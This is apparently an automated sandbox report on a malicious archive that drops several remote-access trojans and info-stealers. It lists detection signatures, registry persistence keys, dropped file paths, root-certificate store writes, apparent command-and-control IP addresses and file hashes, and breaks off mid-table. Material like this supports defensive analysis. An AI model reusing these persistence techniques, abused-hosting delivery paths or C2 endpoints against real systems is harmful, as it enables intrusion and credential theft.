Analysis Overview
SHA256
16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267
Threat Level: Known bad
The file Downloaders.zip was found to be: Known bad.
Malicious Activity Summary
Poverty Stealer
AsyncRat
Quasar RAT
Remcos
Ammyyadmin family
Detect Xworm Payload
Detect XenoRat Payload
AmmyyAdmin payload
Phorphiex, Phorpiex
Quasar payload
Povertystealer family
Xworm
Xenorat family
XenorRat
Phorphiex family
Remcos family
Stealc family
Xworm family
Detect Poverty Stealer Payload
Stealc
Quasar family
Flawedammyy family
Phorphiex payload
FlawedAmmyy RAT
Ammyy Admin
Asyncrat family
Async RAT payload
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Command and Scripting Interpreter: PowerShell
Command and Scripting Interpreter: PowerShell
Adds policy Run key to start application
Uses browser remote debugging
Drops file in Drivers directory
Boot or Logon Autostart Execution: Active Setup
Downloads MZ/PE file
Reads user/profile data of web browsers
Checks computer location settings
Reads data files stored by FTP clients
Clipboard Data
Executes dropped EXE
Drops startup file
Unsecured Credentials: Credentials In Files
Identifies Wine through registry keys
Checks BIOS information in registry
Loads dropped DLL
Themida packer
Event Triggered Execution: Component Object Model Hijacking
Indicator Removal: File Deletion
Obfuscated Files or Information: Command Obfuscation
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Checks installed software on the system
Network Service Discovery
Checks whether UAC is enabled
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
UPX packed file
Enumerates processes with tasklist
Drops file in System32 directory
AutoIT Executable
Drops file in Windows directory
Event Triggered Execution: Netsh Helper DLL
Unsigned PE
Browser Information Discovery
System Location Discovery: System Language Discovery
Detects Pyinstaller
Enumerates physical storage devices
System Network Configuration Discovery: Wi-Fi Discovery
Program crash
NSIS installer
Uses Task Scheduler COM API
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Modifies data under HKEY_USERS
Views/modifies file attributes
Enumerates system info in registry
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Detects videocard installed
Kills process with taskkill
Modifies system certificate store
Suspicious behavior: MapViewOfSection
Suspicious behavior: EnumeratesProcesses
Modifies Internet Explorer settings
Gathers system information
Delays execution with timeout.exe
Scheduled Task/Job: Scheduled Task
Checks processor information in registry
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-26 22:53
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-26 22:53
Reported
2024-11-26 22:54
Platform
win7-20241023-en
Max time kernel
45s
Max time network
42s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Xworm family
Downloads MZ/PE file
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk | C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk | C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\vlst.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\cbchr.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\nurik.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\nurik.exe | N/A |
| N/A | N/A | N/A | N/A |
Loads dropped DLL
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe" | C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\cbchr.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\Files\vlst.exe
"C:\Users\Admin\AppData\Local\Temp\Files\vlst.exe"
C:\Users\Admin\AppData\Local\Temp\Files\cbchr.exe
"C:\Users\Admin\AppData\Local\Temp\Files\cbchr.exe"
C:\Users\Admin\AppData\Local\Temp\Files\random.exe
"C:\Users\Admin\AppData\Local\Temp\Files\random.exe"
C:\Users\Admin\AppData\Local\Temp\Files\nurik.exe
"C:\Users\Admin\AppData\Local\Temp\Files\nurik.exe"
C:\Users\Admin\AppData\Local\Temp\Files\nurik.exe
"C:\Users\Admin\AppData\Local\Temp\Files\nurik.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.130.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| IE | 185.166.142.21:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 52.217.125.121:443 | bbuseruploads.s3.amazonaws.com | tcp |
| NL | 45.66.231.48:80 | tcp | |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 147.185.221.22:47930 | tcp | |
| CN | 183.57.21.131:8095 | tcp | |
| NL | 45.66.231.48:80 | tcp | |
| N/A | 127.0.0.1:47930 | tcp |
Files
memory/2096-0-0x000000007423E000-0x000000007423F000-memory.dmp
memory/2096-1-0x0000000000EF0000-0x0000000000EF8000-memory.dmp
memory/2096-2-0x0000000074230000-0x000000007491E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CabC1AC.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\TarC1DE.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
\Users\Admin\AppData\Local\Temp\Files\svchost.exe
| MD5 | 1ece670aaa09ac9e02ae27b7678b167c |
| SHA1 | d98cffd5d00fe3b8a7a6f50a4cd2fc30b9ec565d |
| SHA256 | b88c6884675cdb358f46c1fbfeddf24af749372a6c14c1c4a2757d7bde3fbc39 |
| SHA512 | ad8b877261b2f69c89aa429691da67100a054006504a2735948415eebdc38eba20f923d327347560d066e65b205e80ea8f0a296e586107dc051d9edc410b40c5 |
memory/2052-117-0x000007FEF53A3000-0x000007FEF53A4000-memory.dmp
memory/2052-118-0x00000000008C0000-0x00000000008DA000-memory.dmp
\Users\Admin\AppData\Local\Temp\Files\vlst.exe
| MD5 | 1b2583d84dca4708d7a0309cf1087a89 |
| SHA1 | cae0d1e16db95b9269b96c06caa66fa3dab99f48 |
| SHA256 | e0d9f3b8d36e9b4a44bc093b47ba3ba80cabd7e08b3f1a64dec7e3a2c5421bac |
| SHA512 | a51b8ed6a6cf403b4b19fc7e9f22d5f60265b16cdf24a7033bc0ee0da8c31861caa212dc5fb3bf17e28842fc28a263564076ad4e9905afd483763859bafd4493 |
memory/1824-125-0x0000000000F80000-0x000000000100C000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6741a2a08c3e65cd6236fd1c114241b9 |
| SHA1 | 82ce04584210e557b1c647c2807deac388baccc9 |
| SHA256 | 9cc223ae8dc54a0e0b0b9021620675c79c325a8ebbf22d8fc945927ad6b63b6f |
| SHA512 | 2b1cdc4833507411c2bdce0353073b54b461ee6b9c43adb56f76d613ecf00e8ae33574e42b978cee4514952f3f5a2333b33fea734af95c6d9d5e2f1b6fc70baa |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 4b2c93661d4a5d7c7a1ae0b2f6a89161 |
| SHA1 | c721d6dc2dd28a87d2300e9fcd648e1b48a4488c |
| SHA256 | 8df4d377ce921fc4f2b098c3366d5d3bb3fc6956213f1fa069fb0510b01bab4a |
| SHA512 | 52be1c227c6ab17132f7519f941000822bb2b3edd1814cdbb2e47e2214cbb5f07102c997bb44ee246da90235657f63d5761b055a2509d7223f041eb36df04abb |
memory/2096-257-0x000000007423E000-0x000000007423F000-memory.dmp
memory/2096-285-0x0000000074230000-0x000000007491E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\cbchr.exe
| MD5 | 9a9afbcbaee06f115ea1b11f0405f2bd |
| SHA1 | 18cc3948891c6189d0ba1f872982c3fe69b3a85b |
| SHA256 | 231711e92fe376ed10c7111645e2a53f392726214c7958afcef4b2b5d0885f17 |
| SHA512 | dcb6b2e888ef234eb775efdac636ab3997bc04d48d50781b4ad4eb77991dfef4a7370441de8c89ff9d17ac5e8d337c5c991f221671fd424f571abbc0f2fe1670 |
memory/2340-293-0x0000000000B80000-0x0000000000BF2000-memory.dmp
memory/2340-294-0x0000000000470000-0x0000000000476000-memory.dmp
\Users\Admin\AppData\Roaming\gdi32.dll
| MD5 | ac2602b169e8948ea4ecd30aeefc5b03 |
| SHA1 | 99a3458622b586477a4df3c1b173892d98de1bb1 |
| SHA256 | 014c9d23f572e0df38c32e294f351c6c232f0118fc6aba8a2a2d70f3c55929f4 |
| SHA512 | 9c9c3fc9c7164ad59564fdfd027b305396c3d589b95826f24a5fec1fe6bde84d3ddac52b8862994b2338e0ef7602fbc9a14999ff986f99d2c21256d53eb03d18 |
\Users\Admin\AppData\Local\Temp\Files\random.exe
| MD5 | 98e538d63ec5a23a3acc374236ae20b6 |
| SHA1 | f3fec38f80199e346cac912bf8b65249988a2a7e |
| SHA256 | 4d8fbc7578dca954407746a1d73e3232cd8db79dccd57acbeef80da369069a91 |
| SHA512 | 951a750998448cd3653153bdf24705101136305ff4744ee2092952d773121817fa36347cb797586c58d0f3efc9cfa40ae6d9ce6ea5d2e8ec41acf8d9a03b0827 |
memory/2740-312-0x00000000000D0000-0x000000000018E000-memory.dmp
memory/2740-313-0x000000001ABE0000-0x000000001AC62000-memory.dmp
memory/2052-314-0x000007FEF53A3000-0x000007FEF53A4000-memory.dmp
\Users\Admin\AppData\Local\Temp\Files\nurik.exe
| MD5 | f9b7e57e9d632443ed2c746aa221dad6 |
| SHA1 | 4fbaeeefd561544f7223c74c864ffae8e1b80f2d |
| SHA256 | 954b49b361654e232e468cd0bf7b8f158efa158fde9414152145b64fa4f9af95 |
| SHA512 | 76a3ad028aaa0236432ad9d6461abed91009bbb868b880453f5932270044e1441727330c3b6ae28ca44779ee70239ac1f7abbc71ed9d4b29198d6558050e49ac |
C:\Users\Admin\AppData\Local\Temp\_MEI28762\ucrtbase.dll
| MD5 | c28cafb11b2dcb4c2845a39556538f8e |
| SHA1 | 021fa38f027e3ddea6b9563d1eb7f9e686b4b11d |
| SHA256 | adc785bdce4f5693b6a511a3a5a20a5de8f90d9ffc357b1b38173da170224e1a |
| SHA512 | 02089da9bf7fbc4e36c3099f2430510647a4467d6915c05cb56e26418b0a4e7c55c0669c737ff3361556ac1610daf159465923f82de60cf080b3caa714a4a4b7 |
C:\Users\Admin\AppData\Local\Temp\_MEI28762\api-ms-win-core-localization-l1-2-0.dll
| MD5 | 3e40ea95fbc64b2b291371fe4bac2d00 |
| SHA1 | 6cb0b9b217e2c4b0b67a4501a54b5600484794f6 |
| SHA256 | 0dd5f83106a08e0f750233c095b149c7a5fe085096518c66494700bc49273452 |
| SHA512 | 3120f8726e8ecd056ce63b479f9e3885fcebae005c86b9a1f4796f86df0873a367fbb7ce9dc16fde3d8f4340bee0c5a16cada148047f113446cabd3c7ca1f132 |
C:\Users\Admin\AppData\Local\Temp\_MEI28762\api-ms-win-core-processthreads-l1-1-1.dll
| MD5 | 753abec37cdc77e980db87629abacae2 |
| SHA1 | d049db76e6e2d142e177c2b107df10d3753797bb |
| SHA256 | 9eeae9e4ec99e3df81b182e22394bbc5582d38cbb756ffb8a8f36d2e915cf876 |
| SHA512 | 1ae91b61e59cef89a3b3ad34666a388d4eeea276ae08a3ffd92d303d765f2fa5315a95bc886858214e5fbbc11040873698be01259dc3197e956f58588427431a |
C:\Users\Admin\AppData\Local\Temp\_MEI28762\api-ms-win-core-file-l1-2-0.dll
| MD5 | de365479d82c17cd3b3d7500e28261cd |
| SHA1 | de90e3493f339859b2f5812a719eef9bb9c32027 |
| SHA256 | 3a7742c1d426538f923ca9503f0ac2bccd102ede5ac29d7d2a46dc4744717908 |
| SHA512 | e82379e512d1c7c0fb38c5a14a5fcdc716f5d3224256850b259abf193fe7a4260f5e677a2f0ccb2bc26d9c419fc72d6f35dab8d8626975d705a869542f3cde59 |
C:\Users\Admin\AppData\Local\Temp\_MEI28762\api-ms-win-core-file-l2-1-0.dll
| MD5 | a33dbfc4243f2599fd2c9630b9354ee9 |
| SHA1 | b5197d0459165c7d2d2d4ada1d4421dcc153360a |
| SHA256 | df3a3ed291be9a8fb1e7d4ee2c2390bd4d6869391cdca38ec123fb3f49086f13 |
